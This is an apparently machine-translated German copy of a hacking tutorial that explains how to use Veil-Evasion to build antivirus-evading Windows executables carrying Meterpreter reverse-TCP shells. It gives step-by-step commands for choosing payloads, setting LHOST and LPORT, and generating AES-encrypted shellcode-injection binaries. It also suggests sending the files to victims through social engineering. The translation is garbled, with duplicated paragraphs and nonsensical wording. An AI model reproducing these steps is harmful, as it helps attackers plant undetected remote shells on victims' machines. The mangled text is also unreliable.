Hacken Wie ein Profi: Wie Umgehen AV-Erkennung mit Veil-Evasion – Null-Byte

Willkommen zurück, meine greenhorn-Hacker! Eine der wichtigsten Fragen für jeden hacker begegnen müssen, ist, wie in der Vergangenheit in Sicherheit Geräte und unentdeckt zu bleiben. Dazu gehören Antiviren-software, intrusion-detection-Systeme, firewalls, web application firewalls, und zahlreiche andere. Wie fast alle diese Geräte verwenden eine Signatur-basierte detection Systems, wo Sie pflegen eine Datenbank von bekannten Sicherheitslücken und den payload signatures, der Schlüssel ist, um entweder:

Willkommen zurück, meine greenhorn-Hacker!

Eine der wichtigsten Fragen für jeden hacker begegnen müssen, ist, wie in der Vergangenheit in Sicherheit Geräte und unentdeckt zu bleiben. Dazu gehören Antiviren-software, intrusion-detection-Systeme, firewalls, web application firewalls, und zahlreiche andere. Wie fast alle diese Geräte verwenden eine Signatur-basierte detection Systems, wo Sie pflegen eine Datenbank von bekannten Sicherheitslücken und den payload signatures, der Schlüssel ist, um entweder:

  1. erstellen Sie Ihren eigenen nutzen, oder
  2. ändern Sie die Signatur eines bekannten zu nutzen oder die Nutzlast.

So erstellen Sie Ihre eigene exploit-und payload ist zeitaufwändig und erfordert fortgeschrittene Fähigkeiten, die Anfänger-hacker ist besser gedient, indem Sie zuerst versucht, ändern Sie die Signatur der exploit und payload.

In vorherigen tutorials haben wir beide Metasploit ist msfpayload/msencode (jetzt veraltet) und msfvenom. In diesen Fällen werden die AV-Entwickler programmiert haben, eine Unterschrift für die Vorlagen, die diese Systeme verwenden. In diesem tutorial schauen wir uns an, ein weiteres re-encoding scheme für das verstecken der Signatur von bekannten Nutzlasten bekannt als Veil-Evasion.

Veil-Evasion wurde speziell entwickelt, um Ihnen zu ermöglichen, ändern Sie die Signatur der Nutzlast. Es ist in Python geschrieben, hat aber zahlreiche Encoder, um Ihnen zu ermöglichen schreiben Sie Ihre code, der Entdeckung zu entgehen in mehrfacher Hinsicht.

Schritt 1: Installieren Veil-Evasion

Wir müssen zuerst installieren Veil-Evasion auf unser system. Wir können download es aus dem Kali-repository. Geben Sie einfach ein:

kali > apt-get install-veil-evasion

Schritt 2: Einrichten Der Veil-Evasion

Starten Veil-Evasion, geben Sie einfach:

kali > veil-evasion

Wenn Sie dies tun, wird man mit diesem Bildschirm öffnen:

Schleier beginnt nun die installation. Es wird Sie Fragen, ob Sie möchten, zu installieren, Abhängigkeiten, sagen Sie “y” für ja. Weiter Veil-Evasion startet den download von allen seinen Abhängigkeiten. Dies kann eine Weile dauern, so geduldig zu sein. Schließlich, Schleier-Steuerhinterziehung wird Sie Fragen, ob Sie möchten, installieren von Python für Windows. Wählen Sie “für alle Benutzer Installieren” und klicken Sie auf die Schaltfläche “Weiter”.

Verwenden Sie die Standard-Verzeichnis, wenn der Installationsassistent fragt, und dann werden Sie begrüßt von einem Bildschirm wie unten. Klicken Sie Auf “Weiter”.

Schließlich werden Sie kommen, um einen Bildschirm wie unten. Gehen Sie vor und klicken Sie auf “Weiter”.

Klicken Sie auf “Next” durch mehrere Bildschirme, bis Sie endlich ein Fenster mit der Schaltfläche “Beenden”. Klicken Sie auf es. Schließlich, Ihre Geduld wird belohnt werden, wenn Sie schließlich ankommen, auf den Bildschirm unten. Jetzt sind wir bereit zu beginnen, verwenden Schleier-Hinterziehung, um eine nahezu nicht nachweisbar Nutzlast.

Schritt 3: Erstellen einer EXE mit einer Nutzlast

In diesem ersten Schritt erstellen wir eine einfache .exe-Datei, die enthält eine Nutzlast, die uns ermöglicht, selbst die betroffenen system. Dies könnte verwendet werden, zu senden, um das Opfer und wenn Sie auf Sie klicken, um es auszuführen. Allgemein, dieser Art von Angriff werden Teil eines social-engineering-Angriff.

Lassen Sie uns nun den Typ “Liste” wird eine Liste aller Nutzlasten, die Veil-Evasion arbeiten kann.

Diejenigen von Euch, die vertraut mit Metasploit erkennen viele dieser Systeme.

Schritt 4: Verwenden einer Nutzlast

In diesem Fall verwenden wir die ruby/meterpreter/rev_tcp, oder die Nummer 44. Lassen Sie uns geben:

> verwenden 44

Wenn wir das tun, Veil-Evasion kommen zurück mit einem Bildschirm wie unten Fragen Sie uns, um die Optionen eingestellt.

Wir müssen LHOST und LPORT.

> set LHOST 192.168.1.101
> set LPORT 6996

Natürlich, verwenden Sie die entsprechende IP-Adresse und port für Ihre Situation.

Als Nächstes müssen wir sagen, Veil-Evasion generieren Sie die ausführbare Datei.

> generieren

Wie Sie sehen können in der Abbildung oben, Veil-Evasion hat, generiert eine neue .exe-Datei, die ich genannt habe “newpayload.exe” (man kann es nennen, was du willst).

Schritt 5: Erzeugen einer Verschlüsselten Payload, der Entdeckung zu Entgehen

Als Nächstes wollen wir versuchen, eine verschlüsselte payload, die wir über AV-software und andere security-Geräte. In diesem Fall verwenden wir eine andere Nutzlast, die auf den payload-Liste, nämlich python/shellcode_inject/aes_encrypt. Dieses payload-Typ verwendet VirtualAlloc Injektion, die erzeugt einen ausführbaren Speicherbereich für den shellcode und dann sperren, dass der Speicherbereich im physikalischen Speicher.

Dies ist die Nummer 32 auf unserer payload-Liste, so geben Sie:

> info 32

Es gibt dann Infos über die Nutzlast, wie unten zu sehen.

Dieser payload verwendet VirtualAlloc-Injektion in Verbindung mit AES-Verschlüsselung (AES, Advanced Encryption Standard, gemeinhin als eines der stärksten Verschlüsselung verfügbar), um zu verschleiern Ihre wahre Natur von AV-software und andere security-Geräte.

Nächste, lassen Sie uns sagen, Veil-Evasion wollen wir mit dieser Nutzlast.

> 32

Hier haben wir die option ändern Sie die Standard-Optionen ist es uns wichtig, dies zu tun. Für nun, lassen Sie uns lassen Sie die Standard-Optionen, wie Sie sind.

Nächste, lassen Sie uns sagen, Veil-Evasion wollen wir generieren diese verschlüsselte payload.

> generieren

Wenn wir das tun, wird es die Standard-payload windows/meterpreter/reverse_tcp und dann aufgefordert, uns für die LHOST und LPORT. Wenn wir fertig sind die Eingabe der entsprechenden Informationen für unsere Nutzlast, wird es beginnen, um den shellcode generieren. Dies kann einige Minuten dauern, so geduldig zu sein.

Neben, Schleier-Hinterziehung werden aufgefordert, uns für das, was wir benennen wollen, unsere Nutzlast. Sie können welchen Namen auch immer Ihr Herz begehrt, aber ich habe die einfache “veilpayload.”

Schließlich Veil-Evasion wird Ihre arbeiten abschließen und uns mit dem fertigen Produkt, wie wir weiter unten sehen.

Dieser neue code mit dem meterpreter-eingebettet in erhalten Vergangenheit die meisten AV-software und security-devices. Wie alles andere, die AV-Entwickler werden wahrscheinlich einen Weg finden, um zu erkennen, sogar das payload, also seien Sie kreativ und versuchen, andere Nutzlast Verschleierung Methoden in Veil-Evasion, bis Sie eine finden, die versteckt Ihre Nutzlast.

Die Umgehung der Sicherheits-software und Geräten zählt zu den wichtigsten Aufgaben der hacker, und Veil-Evasion ist ein weiteres tool in unserem arsenal. Halten Sie im Verstand, obwohl, dass es NIEMALS nur eine einzige, endgültige Lösung. Der hacker muss hartnäckig sein und kreative Wege zu finden über diese Geräte, so dass, wenn eine Methode fehlschlägt, versuchen Sie eine andere, dann versuchen Sie eine andere, bis Sie eine finden, die funktioniert.

Leave a Reply

Your email address will not be published. Required fields are marked *